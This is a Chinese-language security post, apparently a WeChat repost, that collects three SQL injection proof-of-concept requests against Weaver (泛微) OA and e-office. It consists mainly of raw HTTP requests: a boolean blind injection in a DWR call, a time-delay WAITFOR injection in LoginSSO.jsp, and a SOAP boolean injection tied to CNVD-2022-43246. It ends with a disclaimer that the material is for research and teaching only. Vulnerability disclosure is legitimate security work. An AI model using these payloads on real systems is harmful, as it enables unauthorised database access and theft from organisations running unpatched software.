0x01 阅读须知
0x02 漏洞描述
(一) 泛微
泛微成立于2001年,是一家专注于协同管理软件领域的公司。它帮助组织构建统一的数字化运营平台,提供高效、灵活、可靠的产品和服务。作为国家重点软件企业,泛微始终保持技术创新,引领协同管理软件行业的发展。其产品广泛应用于各行各业,帮助企业实现数字化转型和提升工作效率。。
(二) 漏洞poc
1、泛微-ifNewsCheckOutByCurrentUser-布尔盲注
POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Type: text/plain
callCount=1
page=
httpSessionId=
scriptSessionId=
c0-scriptName=DocDwrUtil
c0-methodName=ifNewsCheckOutByCurrentUser
c0-id=0
c0-param0=string:1*
c0-param1=string:1
batchId=0
2、泛微-LoginSSO-延时注入
GET /weaver/FileDownloadLocation/login/LoginSSO.%2520jsp?ddcode=7ea7ef3c41d67297&mailid=0&mrfuuid=1';WAITFOR+delay+'0:0:6'--+&a=.swf HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
3、泛微eoffice-cnvd-2022-43246布尔注入
POST /webservice-json/login/login.wsdl.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: text/xml
<
soapenv:Envelope
xmlns:xsi
=
"http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd
=
"http://www.w3.org/2001/XMLSchema"
xmlns:soapenv
=
"http://schemas.xmlsoap.org/soap/envelope/"
xmlns:urn
=
"urn:LoginServicewsdl"
>
<
soapenv:Header
/>
<
soapenv:Body
>
<
urn:GetCurrentInformation
soapenv:encodingStyle
=
"http://schemas.xmlsoap.org/soap/encoding/"
>
<
UserId
xsi:type
=
"xsd:string"
>
a'+if(1=1,0,1)+'n
</
UserId
>
</
urn:GetCurrentInformation
>
</
soapenv:Body
>
</
soapenv:Envelope
>
原文始发于微信公众号(SCA御盾):【nday、1day】3个泛微注入漏洞集合
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论